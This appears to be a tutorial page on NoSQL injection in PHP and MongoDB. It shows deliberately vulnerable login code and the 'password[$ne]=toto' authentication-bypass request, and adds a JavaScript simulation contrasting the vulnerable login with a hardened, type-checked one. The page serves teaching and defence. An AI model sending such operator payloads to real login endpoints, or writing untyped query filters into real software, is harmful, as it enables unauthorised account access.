NoSQL Injection (NoSQLi)


Depending on a company's or an application's needs, a NoSQL database may be used instead of a traditional SQL database. This is often the case when using a GraphQL API model.

While NoSQL databases such as MongoDB are inherently more resilient to common attacks, they can still be exploited.

Assume we have the following PHP code:

<?php
// dummy.php?username=admin&password=toto
// $db_accounts is a MongoDB\Collection (mongodb/mongodb library);
// both request parameters go straight into the query filter, untyped.
$result = $db_accounts->find([
  'username' => $_GET['username'],
  'password' => $_GET['password'],
]);

The following query will be executed:

db.accounts.find({ "username": "admin", "password": "toto" });

In PHP, query-string parameters written with bracket syntax are parsed into arrays: dummy.php?username=admin&password[$ne]=toto turns $_GET['password'] into ['$ne' => 'toto'], which lets us control the query and bypass authentication.

// $_GET['password'] is now the array ['$ne' => 'toto']
// Nothing checks the type of the input, so an operator object is injected into the query:
db.accounts.find({ "username": "admin", "password": { "$ne": "toto" }});
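The parameter-to-array step and the resulting query, as an added example (not code from the original page) written in JavaScript rather than the page's PHP: a small parser that mimics PHP's bracket syntax, an in-memory stand-in for MongoDB's find() that understands $ne, $nin and $regex, and the vulnerable login next to a hardened one that rejects anything other than plain strings. The account records, the probe string and all function names are constructed for this example.

```javascript
// Added example (not from the original page): a JavaScript model of PHP's
// bracket-to-array parsing and of MongoDB's find(), run entirely in memory
// so it needs no database.

// Constructed sample collection.
const accounts = [
  { username: 'admin', password: 'S3cret!' },
  { username: 'bob',   password: 'hunter2' },
];

// Mimics PHP: "password[$ne]=toto" parses to { password: { "$ne": "toto" } }.
// One level of nesting is enough to reproduce the bypass on the page.
function parseQueryLikePhp(queryString) {
  const params = {};
  for (const pair of queryString.split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const key = decodeURIComponent(eq === -1 ? pair : pair.slice(0, eq));
    const value = eq === -1 ? '' : decodeURIComponent(pair.slice(eq + 1));
    const m = key.match(/^([^\[]+)\[([^\]]*)\]$/);
    if (m) {
      const [, base, sub] = m;
      if (typeof params[base] !== 'object' || params[base] === null) params[base] = {};
      params[base][sub] = value;
    } else {
      params[key] = value;
    }
  }
  return params;
}

// Minimal evaluator for one field condition: plain equality, or an operator
// object using $ne, $nin or $regex (the operators mentioned on the page).
function matchesCondition(fieldValue, condition) {
  if (typeof condition !== 'object' || condition === null) {
    return fieldValue === condition;
  }
  return Object.entries(condition).every(([op, arg]) => {
    switch (op) {
      case '$ne':    return fieldValue !== arg;
      case '$nin':   return !(Array.isArray(arg) ? arg : [arg]).includes(fieldValue);
      case '$regex': return new RegExp(arg).test(String(fieldValue));
      default:       throw new Error(`unsupported operator ${op}`);
    }
  });
}

// Stand-in for db.accounts.find(filter): every field of the filter must match.
function find(collection, filter) {
  return collection.filter(doc =>
    Object.entries(filter).every(([field, cond]) => matchesCondition(doc[field], cond)));
}

// Vulnerable login, mirroring the PHP on the page: whatever the parser
// produced (a string or an operator object) goes straight into the filter.
function loginVulnerable(queryString) {
  const p = parseQueryLikePhp(queryString);
  return find(accounts, { username: p.username, password: p.password }).length > 0;
}

// Hardened login: only plain strings may reach the filter. In PHP the same
// check is is_string($_GET['password']) or a (string) cast before the query.
function loginHardened(queryString) {
  const p = parseQueryLikePhp(queryString);
  if (typeof p.username !== 'string' || typeof p.password !== 'string') {
    return false; // reject; worth logging as a probable injection attempt
  }
  return find(accounts, { username: p.username, password: p.password }).length > 0;
}

// Constructed probe, the same request as on the page.
const probe = 'username=admin&password[$ne]=toto';
console.log(parseQueryLikePhp(probe)); // { username: 'admin', password: { '$ne': 'toto' } }
console.log(loginVulnerable(probe));   // true  (authentication bypassed)
console.log(loginHardened(probe));     // false (operator object rejected)
```

The type check is the whole fix: the database is doing exactly what it was asked, so the defence belongs where untrusted input is turned into a query, and a non-string value in a field that should only ever be a string is also a clean detection signal for application logs.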

👻 To-do 👻

Stuff that I found, but never read/used yet.

  • $nin for "NOT IN" an array of values
  • $regex for a condition based on a regular expression